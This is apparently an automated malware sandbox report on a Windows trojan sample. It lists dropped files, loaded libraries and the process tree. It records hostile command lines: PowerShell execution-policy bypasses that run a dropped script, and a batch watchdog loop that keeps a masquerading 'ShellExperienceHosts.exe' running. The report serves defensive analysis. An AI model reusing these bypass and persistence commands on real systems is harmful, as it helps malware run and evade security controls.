Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exeCode function: 3_2_6C6C622C3_2_6C6C622C
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exeCode function: 3_2_6C7262CD3_2_6C7262CD
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exeCode function: 3_2_6C6D9D683_2_6C6D9D68
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exeCode function: 3_2_6C729D8F3_2_6C729D8F
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exeCode function: 3_2_6C6C7E5A3_2_6C6C7E5A
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exeCode function: 3_2_6C6CBEEC3_2_6C6CBEEC
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exeCode function: 3_2_6C7F1F413_2_6C7F1F41
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exeCode function: 3_2_6C6EB8F83_2_6C6EB8F8
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exeCode function: 3_2_6C723A0E3_2_6C723A0E
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exeCode function: 3_2_6C6D3AF03_2_6C6D3AF0
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exeCode function: 3_2_6C73BB743_2_6C73BB74
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exeCode function: 3_2_6C6C96D23_2_6C6C96D2
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exeCode function: 3_2_6C6F93CB3_2_6C6F93CB
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exeCode function: 3_2_1001122F3_2_1001122F
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exeCode function: 3_2_100024B03_2_100024B0
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exeCode function: 3_2_1000B66A3_2_1000B66A
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exeCode function: 3_2_100117803_2_10011780
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exeCode function: 3_2_10010CDE3_2_10010CDE
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exeCode function: 3_2_10012D913_2_10012D91
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exeCode function: 3_2_10011E5C3_2_10011E5C
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exeCode function: 3_2_022300323_2_02230032
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exeCode function: 3_2_022412063_2_02241206
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exeCode function: 3_2_0223B6413_2_0223B641
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exeCode function: 3_2_022417573_2_02241757
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exeCode function: 3_2_02240CB53_2_02240CB5
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exeCode function: 3_2_022324873_2_02232487
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exeCode function: 3_2_02242D683_2_02242D68
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exeCode function: 3_2_031BF3BE3_2_031BF3BE
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exeCode function: 3_2_031BD25E3_2_031BD25E
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exeCode function: 3_2_031A82BF3_2_031A82BF
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exeCode function: 3_2_031A689F3_2_031A689F
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exeCode function: 3_2_031BD7AF3_2_031BD7AF
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exeCode function: 3_2_031A660F3_2_031A660F
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exeCode function: 3_2_031A1E6F3_2_031A1E6F
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exeCode function: 3_2_031BDD003_2_031BDD00
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exeCode function: 3_2_031B7D403_2_031B7D40
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 17_2_02B8106A17_2_02B8106A
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 17_2_02B8166D17_2_02B8166D
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 17_2_02B8165317_2_02B81653
Source: Joe Sandbox ViewDropped File: C:\Users\Public\Bulete\program\ShellExperienceHosts.exe 41F413DEBFE785B95D852A396AEFE1C814F3C13BDEDF85526F2DC4E83127D6CA
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exe | Code function: String function: 6C7A123B appears 112 times
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exe | Code function: String function: 6C84CB06 appears 37 times
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exe | Code function: String function: 03334300 appears 32 times
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exe | Code function: String function: 6C6E1262 appears 69 times
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exe | Code function: String function: 6C6BC0EA appears 66 times
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exe | Code function: String function: 6C75B4B6 appears 44 times
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exe | Code function: String function: 6C6B421A appears 36 times
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exe | Code function: String function: 6C7A0640 appears 74 times
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exe | Code function: String function: 6C7A11D2 appears 278 times
Source: S1Rv3ioghk.exe | Static PE information: invalid certificate
Source: yyzyBase.dll.0.dr | Static PE information: Resource name: RT_VERSION type: COM executable for DOS
Source: wps_lid.lid-s8HDMqE8a6Xy.exe.0.dr | Static PE information: Resource name: ZIPRES type: Zip archive data, at least v1.0 to extract, compression method=store
Source: wps_lid.lid-s8HDMqE8a6Xy.exe.0.dr | Static PE information: Resource name: ZIPRES type: Zip archive data, at least v1.0 to extract, compression method=store
Source: backup.dll.3.dr | Static PE information: Resource name: RT_VERSION type: COM executable for DOS
Source: S1Rv3ioghk.exe, 00000000.00000003.1701410511.0000000002F1A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameAOKAISB.exe< vs S1Rv3ioghk.exe
Source: S1Rv3ioghk.exe, 00000000.00000003.1701410511.0000000002F1A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamekonlinesetup_xa.exe6 vs S1Rv3ioghk.exe
Source: S1Rv3ioghk.exe, 00000000.00000002.1707325003.00000000006D6000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameCmd.Exej% vs S1Rv3ioghk.exe
Source: S1Rv3ioghk.exe, 00000000.00000000.1693064062.0000000000442000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: OriginalFilenameEasiNote.dll6 vs S1Rv3ioghk.exe
Source: S1Rv3ioghk.exe, 00000000.00000000.1693064062.0000000000442000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: OriginalFileNameosprovision.exe` vs S1Rv3ioghk.exe
Source: S1Rv3ioghk.exe, 00000000.00000003.1704068985.0000000003A20000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamekonlinesetup_xa.exe6 vs S1Rv3ioghk.exe
Source: S1Rv3ioghk.exe, 00000000.00000003.1693975412.00000000024B1000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameEasiNote.dll6 vs S1Rv3ioghk.exe
Source: S1Rv3ioghk.exe, 00000000.00000003.1693975412.00000000024B1000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFileNameosprovision.exe` vs S1Rv3ioghk.exe
Source: S1Rv3ioghk.exe | Binary or memory string: OriginalFilenameEasiNote.dll6 vs S1Rv3ioghk.exe
Source: S1Rv3ioghk.exe | Binary or memory string: OriginalFileNameosprovision.exe` vs S1Rv3ioghk.exe
Source: S1Rv3ioghk.exe | Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: ShellExperienceHosts.exe.0.dr | Static PE information: Section: .tp6 ZLIB complexity 1.000637755102041
Source: backup.exe.3.dr | Static PE information: Section: .tp6 ZLIB complexity 1.000637755102041
Source: classification engine | Classification label: mal100.troj.spyw.evad.winEXE@43/28@0/1
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exe | Code function: 3_2_03327B70 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,CloseHandle,CloseHandle,3_2_03327B70
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exe | Code function: 3_2_03327740 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,3_2_03327740
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exe | Code function: 3_2_03327620 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,CloseHandle,GetModuleHandleA,GetProcAddress,GetCurrentProcessId,OpenProcess,3_2_03327620
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exe | Code function: 3_2_03326C50 wsprintfW,MultiByteToWideChar,GetDriveTypeW,GetDiskFreeSpaceExW,_memset,GlobalMemoryStatusEx,swprintf,swprintf,3_2_03326C50
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exe | Code function: 3_2_03326050 _memset,CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,Process32NextW,CloseHandle,CloseHandle,3_2_03326050
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exe | Code function: 3_2_03326150 wsprintfW,_memset,lstrcatW,lstrcatW,lstrcatW,CoCreateInstance,wsprintfW,RegOpenKeyExW,_memset,wsprintfW,RegOpenKeyExW,_memset,RegQueryValueExW,lstrcatW,lstrcatW,lstrcatW,RegCloseKey,lstrlenW,lstrcatW,3_2_03326150
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exe | Code function: 3_2_6C6D9953 GetModuleHandleA,SizeofResource,LockResource,FindResourceW,LoadResource,SizeofResource,FindResourceW,LockResource,3_2_6C6D9953
Source: C:\Users\user\Desktop\S1Rv3ioghk.exe | File created: C:\Users\Public\Bulete
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:744:120:WilError_03
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Mutant created: NULL
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exe | Mutant created: \Sessions\1\BaseNamedObjects\2024.11.26
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5244:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5912:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5516:120:WilError_03
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exe | File created: C:\Users\user\AppData\Local\Temp\monitor.bat
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /B /c "C:\Users\user\AppData\Local\Temp\\monitor.bat"
Source: S1Rv3ioghk.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Windows\SysWOW64\tasklist.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = 'SHELLEXPERIENCEHOSTS.EXE'
Source: C:\Windows\SysWOW64\tasklist.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = 'SHELLEXPERIENCEHOSTS.EXE'
Source: C:\Windows\SysWOW64\tasklist.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = 'SHELLEXPERIENCEHOSTS.EXE'
Source: C:\Windows\SysWOW64\tasklist.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = 'SHELLEXPERIENCEHOSTS.EXE'
Source: C:\Users\user\Desktop\S1Rv3ioghk.exe | File read: C:\Users\user\Desktop\desktop.ini
Source: C:\Users\user\Desktop\S1Rv3ioghk.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: S1Rv3ioghk.exe, 00000000.00000003.1701410511.0000000002F1A000.00000004.00000020.00020000.00000000.sdmp, wps_lid.lid-s8HDMqE8a6Xy.exe.0.dr | Binary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: S1Rv3ioghk.exe, 00000000.00000003.1701410511.0000000002F1A000.00000004.00000020.00020000.00000000.sdmp, wps_lid.lid-s8HDMqE8a6Xy.exe.0.dr | Binary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
Source: S1Rv3ioghk.exe, 00000000.00000003.1701410511.0000000002F1A000.00000004.00000020.00020000.00000000.sdmp, wps_lid.lid-s8HDMqE8a6Xy.exe.0.dr | Binary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
Source: S1Rv3ioghk.exe | Virustotal: Detection: 66%
Source: S1Rv3ioghk.exe | ReversingLabs: Detection: 65%
Source: C:\Users\user\Desktop\S1Rv3ioghk.exe | File read: C:\Users\user\Desktop\S1Rv3ioghk.exe
Source: unknown | Process created: C:\Users\user\Desktop\S1Rv3ioghk.exe "C:\Users\user\Desktop\S1Rv3ioghk.exe"
Source: C:\Users\user\Desktop\S1Rv3ioghk.exe | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c start C:\Users\Public\Bulete\program\ShellExperienceHosts.exe
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Users\Public\Bulete\program\ShellExperienceHosts.exe C:\Users\Public\Bulete\program\ShellExperienceHosts.exe
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /B /c "C:\Users\user\AppData\Local\Temp\\monitor.bat"
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\tasklist.exe tasklist /FI "IMAGENAME eq ShellExperienceHosts.exe"
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\findstr.exe findstr /I "ShellExperienceHosts.exe"
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 30 /nobreak
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C powershell -Command "Set-ExecutionPolicy Unrestricted -Scope CurrentUser"
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C powershell -ExecutionPolicy Bypass -File C:\Users\user\AppData\Local\updated.ps1
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Set-ExecutionPolicy Unrestricted -Scope CurrentUser"
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -ExecutionPolicy Bypass -File C:\Users\user\AppData\Local\updated.ps1
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\tasklist.exe tasklist /FI "IMAGENAME eq ShellExperienceHosts.exe"
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\findstr.exe findstr /I "ShellExperienceHosts.exe"
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 30 /nobreak
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\tasklist.exe tasklist /FI "IMAGENAME eq ShellExperienceHosts.exe"
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\findstr.exe findstr /I "ShellExperienceHosts.exe"
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 30 /nobreak
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\tasklist.exe tasklist /FI "IMAGENAME eq ShellExperienceHosts.exe"
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\findstr.exe findstr /I "ShellExperienceHosts.exe"
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 30 /nobreak
Source: C:\Users\user\Desktop\S1Rv3ioghk.exe | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c start C:\Users\Public\Bulete\program\ShellExperienceHosts.exe
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Users\Public\Bulete\program\ShellExperienceHosts.exe C:\Users\Public\Bulete\program\ShellExperienceHosts.exe
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /B /c "C:\Users\user\AppData\Local\Temp\\monitor.bat"
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C powershell -Command "Set-ExecutionPolicy Unrestricted -Scope CurrentUser"
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C powershell -ExecutionPolicy Bypass -File C:\Users\user\AppData\Local\updated.ps1
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\tasklist.exe tasklist /FI "IMAGENAME eq ShellExperienceHosts.exe"
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\findstr.exe findstr /I "ShellExperienceHosts.exe"
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 30 /nobreak
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\tasklist.exe tasklist /FI "IMAGENAME eq ShellExperienceHosts.exe"
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\findstr.exe findstr /I "ShellExperienceHosts.exe"
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 30 /nobreak
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\tasklist.exe tasklist /FI "IMAGENAME eq ShellExperienceHosts.exe"
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\findstr.exe findstr /I "ShellExperienceHosts.exe"
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 30 /nobreak
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\tasklist.exe tasklist /FI "IMAGENAME eq ShellExperienceHosts.exe"
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\findstr.exe findstr /I "ShellExperienceHosts.exe"
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 30 /nobreak
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Set-ExecutionPolicy Unrestricted -Scope CurrentUser"
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -ExecutionPolicy Bypass -File C:\Users\user\AppData\Local\updated.ps1
Source: C:\Users\user\Desktop\S1Rv3ioghk.exe | Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\S1Rv3ioghk.exe | Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\S1Rv3ioghk.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\S1Rv3ioghk.exe | Section loaded: wldp.dll
Source: C:\Users\user\Desktop\S1Rv3ioghk.exe | Section loaded: profapi.dll
Source: C:\Users\user\Desktop\S1Rv3ioghk.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\S1Rv3ioghk.exe | Section loaded: propsys.dll
Source: C:\Users\user\Desktop\S1Rv3ioghk.exe | Section loaded: edputil.dll
Source: C:\Users\user\Desktop\S1Rv3ioghk.exe | Section loaded: urlmon.dll
Source: C:\Users\user\Desktop\S1Rv3ioghk.exe | Section loaded: iertutil.dll
Source: C:\Users\user\Desktop\S1Rv3ioghk.exe | Section loaded: srvcli.dll
Source: C:\Users\user\Desktop\S1Rv3ioghk.exe | Section loaded: netutils.dll
Source: C:\Users\user\Desktop\S1Rv3ioghk.exe | Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\Desktop\S1Rv3ioghk.exe | Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\S1Rv3ioghk.exe | Section loaded: wintypes.dll
Source: C:\Users\user\Desktop\S1Rv3ioghk.exe | Section loaded: appresolver.dll
Source: C:\Users\user\Desktop\S1Rv3ioghk.exe | Section loaded: bcp47langs.dll
Source: C:\Users\user\Desktop\S1Rv3ioghk.exe | Section loaded: slc.dll
Source: C:\Users\user\Desktop\S1Rv3ioghk.exe | Section loaded: userenv.dll
Source: C:\Users\user\Desktop\S1Rv3ioghk.exe | Section loaded: sppc.dll
Source: C:\Users\user\Desktop\S1Rv3ioghk.exe | Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\Desktop\S1Rv3ioghk.exe | Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: apphelp.dll
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exe | Section loaded: yyzybase.dll
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exe | Section loaded: uxtheme.dll
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exe | Section loaded: msimg32.dll
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exe | Section loaded: oleacc.dll
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exe | Section loaded: winmm.dll
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exe | Section loaded: oledlg.dll
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exe | Section loaded: cryptsp.dll
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exe | Section loaded: rsaenh.dll
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exe | Section loaded: cryptbase.dll
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exe | Section loaded: windows.storage.dll
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exe | Section loaded: wldp.dll
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exe | Section loaded: propsys.dll
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exe | Section loaded: profapi.dll
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exe | Section loaded: linkinfo.dll
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exe | Section loaded: ntshrui.dll
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exe | Section loaded: sspicli.dll
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exe | Section loaded: srvcli.dll
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exe | Section loaded: cscapi.dll
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exe | Section loaded: ntmarta.dll
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exe | Section loaded: mswsock.dll
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exe | Section loaded: napinsp.dll
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exe | Section loaded: pnrpnsp.dll
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exe | Section loaded: wshbth.dll
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exe | Section loaded: nlaapi.dll
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exe | Section loaded: iphlpapi.dll
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exe | Section loaded: dnsapi.dll
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exe | Section loaded: winrnr.dll
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exe | Section loaded: fwpuclnt.dll
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exe | Section loaded: rasadhlp.dll
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exe | Section loaded: dxgi.dll
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exe | Section loaded: dinput8.dll
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exe | Section loaded: inputhost.dll
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exe | Section loaded: coremessaging.dll
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exe | Section loaded: wintypes.dll
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exe | Section loaded: coreuicomponents.dll
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exe | Section loaded: resourcepolicyclient.dll
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exe | Section loaded: devenum.dll
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exe | Section loaded: devobj.dll
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exe | Section loaded: msasn1.dll
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exe | Section loaded: msdmo.dll
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exe | Section loaded: avicap32.dll
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exe | Section loaded: msvfw32.dll
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exe | Section loaded: windowscodecs.dll
Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: cmdext.dll
Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: version.dll
Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: winsta.dll
Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\timeout.exe | Section loaded: version.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
